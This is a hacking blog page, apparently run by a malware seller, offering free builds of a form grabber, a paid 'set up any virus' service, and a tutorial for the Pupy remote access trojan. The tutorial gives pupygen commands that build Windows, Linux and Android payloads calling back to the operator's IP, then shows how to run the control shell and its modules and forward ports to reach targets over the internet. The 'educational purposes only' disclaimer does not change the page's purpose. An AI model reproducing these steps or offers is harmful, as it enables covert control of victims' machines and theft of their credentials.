Friday, December 15, 2017

Dear Users,

I am planning to give out free bins to users who wants to test my form book grabber.

please contact me  in skype.

Sunday, March 12, 2017

Hello guys,its been a while i have been here, i am bored and decided to offer you all my service to set up any virus u want ( FREE /Cracked) Paid ones if u have builders. 
I am doing this as long as am free.

If u guys want it Add me on skype - slaider.safehacker

Enjoy ur day !


Thursday, December 1, 2016

What is Pupy?Pupy is an opensource, multi-platform (Windows, Linux, OSX, Android), multi function RAT (Remote Administration Tool) and post-exploitation tool mainly written in python. 
It features a all-in-memory execution guideline and leaves very low footprint. Pupy can communicate using various transports, migrate into processes (reflective injection), load remote python code, python packages and python C-extensions from memory.
Read more: https://github.com/n1nj4sec/pupy

In this tutorial, I'll be showing you how to setup Pupy and generate payloads for Windows, Linux and Android.

Warning
This guide is meant for educational purposes only, accessing other people's computers without appropriate permissions is illegal and I don't condone it in any way.
I am not responsible for your actions.

Getting Started...
To get started, head over to the official Pupy GitHub repo and download the entire project as a zip file.

[Image: a9dd1c3f47.png]

Extract the contents of the archive and read the text file titled 'Requirements.txt' inside the folder.
This text file contains the list of packages required for setting up Pupy - make sure you install all of them.

Generating The Payload
Once you're done installing all the packages, we're ready to generate our payload.

For this, open a terminal window in the directory which contains the 'pupygen.py' file and type:

Code:
./pupygen.py
You should now be able to see the proper usage/parameters to be used while generating the payload.
[Image: pupy1.png]

Now open a different terminal and type in the following command to find your IP address:

Code:
ifconfig
[Image: ifconfig.png]
The highlighted IP address is the one to which you want your target machines to connect. 
Note it down and close the terminal.

Here are the commands for generating payloads for Windows, Linux and Android respectively.
[Image: pupy2.png]

Windows:

Code:
./pupygen.py -f exe_x86 -o <FileName>.exe connect --host <IP:Port>
Replace IP:Port with the IP address that we obtained in the above step and any valid port number that is not currently in use.
For targeting 64bit machines, change exe_x86 to exe_x64.

Linux:

Code:
./pupygen.py -f py -o <FileName>.py connect --host <IP:Port>

Android:

Code:
./pupygen.py -f apk -o <FileName>.apk connect --host <IP:Port>

[Image: pupy3.png]
If everything went well, it should say "payload successfully generated" and the payload should be visible in the same folder.

Remote Administration
To begin remote administration once the payload has been deployed, open another terminal in the same folder and type in:

Code:
./pupysh.py
That will open up the Pupy shell. If it says "Server started on port <PORTNUMBER> with transport ssl", it means your port number was valid and not in use and you're all set to accept the connecting from the target machine.
Input a question mark (?) to get the list of all the available commands.
[Image: pupysh.png]

To see all the available modules, type in:

Code:
list_modules
[Image: modules.png]

To use a particular module, follow the format:

Code:
run <MODULE NAME>
If a module requires additional parameters, that will be specified.

Once you're done remotely administrating the machine, use the following command to disconnect all the clients:

Code:
run general/exit

Conclusion

This works over LAN. If you wish to do this over the internet, find your public IP address online and make sure that the port you select is appropriately forwarded.

A simple Windows 32bit payload generated by Pupy is around 6MB in size (pretty big) and it is in no way perfect. But it is free and opensource! 
Keep that in mind while using Pupy.

That's pretty much it. 
If you have any questions, feel free to ask.

adf popup

adf

MY SKYPE

Powered by Blogger.

Random Posts

Featured Post

Form Grabber Released Works With IE,CROME and FIREFOX ,Unicode support [ 14-02-2016]

Hello guys! here i am releasing My form grabber Today, i have been coding this for oven 6 months and finally its time for public sales.....

Followers

Recent in Culture

News

Lorem 1

Pages

Popular Posts

Popular Posts